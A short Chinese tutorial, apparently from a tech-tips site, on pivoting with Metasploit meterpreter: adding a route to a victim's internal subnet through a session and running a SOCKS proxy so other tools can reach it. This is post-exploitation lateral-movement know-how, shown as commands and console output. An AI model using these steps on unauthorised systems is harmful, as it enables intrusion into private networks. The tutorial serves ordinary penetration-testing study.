共计 1697 个字符,预计需要花费 5 分钟才能阅读完成。
这篇文章主要介绍“meterpreter 中如何开启 pivot 代理”,在日常操作中,相信很多人在 meterpreter 中如何开启 pivot 代理问题上存在疑惑,丸趣 TV 小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”meterpreter 中如何开启 pivot 代理”的疑惑有所帮助!接下来,请跟着丸趣 TV 小编一起来学习吧!
pivot 是 meterpreter 最常用的一种代理,可以轻松把你的机器代理到受害者内网环境。
使用方法:
route add 目标 i 或 ip 段 Netmask 要使用代理的会话 ID通过实例来说明:
在 metasploit 添加一个路由表,目的是访问 172.16.100.0/24 这个网段,将通过 meterpreter 的会话 1 来访问:
msf6 exploit(multi/handler) route add 172.16.100.0 255.255.255.0 1
[*] Route added
msf6 exploit(multi/handler) route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.16.100.0 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined.到这里 pivot 已经配置好了,你在 msf 里对 172.16.100.0/24 进行扫描 (db_nmap) 或者访问 (psexe 模块,ssh 模块等) 将通过代理 session 1 这个会话来访问。
如果想通过其他应用程序来使用这个代理怎么办呢,这时候可以借助 metasploit socks_proxy 提供一个监听隧道供其他应用程序访问:
首先使用 socks_proxy 并且配置,监听端口:
msf6 auxiliary(scanner/ssh/ssh_login) use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) set srvport 1011
srvport = 1011
msf6 auxiliary(server/socks_proxy) run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy)
[*] Starting the SOCKS proxy server到此,关于“meterpreter 中如何开启 pivot 代理”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注丸趣 TV 网站,丸趣 TV 小编会继续努力为大家带来更多实用的文章!
